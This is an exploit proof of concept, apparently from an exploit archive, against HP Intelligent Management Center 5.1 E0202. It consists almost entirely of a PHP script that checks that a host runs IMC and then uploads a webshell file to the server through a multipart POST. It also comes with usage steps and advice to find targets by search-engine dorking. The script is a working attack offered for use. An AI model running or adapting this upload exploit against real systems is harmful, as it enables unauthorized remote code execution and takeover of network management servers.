=============================================================================================================================================
| # Title     : HP Intelligent Management Center 5.1 E0202 Shell Upload Vulnerability                                                       |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
| # Vendor    : https://support.hpe.com/hpesc/public/docDisplay?docId=c03177356                                                             |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: Upload a malicious PHP file (such as a Webshell) to the server.
	
[+] save code as poc.php.

[+] Set Target : line 54

[+] USage : php poc.php 

[+] PayLoad :

<?php

function is_imc($target) {
    $url = "$target/login.jsf";
    $response = @file_get_contents($url);
    
    if ($response !== false && strpos($response, "HP Intelligent Management Center") !== false) {
        return true;
    }
    return false;
}

function upload_file($ip, $port, $target_uri, $upload_path, $local_file) {
    if (!is_imc("http://$ip:$port$target_uri")) {
        echo "$ip:$port - This isn't an HP Intelligent Management Center\n";
        return;
    }
    
    $file_content = file_get_contents($local_file);
    if ($file_content === false) {
        echo "Failed to read local file: $local_file\n";
        return;
    }
    
    $boundary = "----WebKitFormBoundary" . md5(time());
    $eol = "\r\n";
    
    $data = "--$boundary$eol";
    $data .= "Content-Disposition: form-data; name=\"file\"; filename=\"" . basename($local_file) . "\"$eol";
    $data .= "Content-Type: application/octet-stream$eol$eol";
    $data .= $file_content . "$eol";
    $data .= "--$boundary--$eol";
    
    $opts = [
        "http" => [
            "method" => "POST",
            "header" => "Content-Type: multipart/form-data; boundary=$boundary\r\n",
            "content" => $data
        ]
    ];
    
    $url = "http://$ip:$port$target_uri/$upload_path";
    echo "$ip:$port - Uploading file...\n";
    $response = @file_get_contents($url, false, stream_context_create($opts));
    
    if ($response !== false) {
        echo "$ip:$port - File uploaded successfully to $url\n";
    } else {
        echo "$ip:$port - File upload failed\n";
    }
}

// Example usage
$ip = "192.168.1.1";
$port = 8080;
$target_uri = "/imc";
$upload_path = "uploads/shell.php"; // Adjust this path as needed
$local_file = "shell.php"; // Your payload file

upload_file($ip, $port, $target_uri, $upload_path, $local_file);

?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================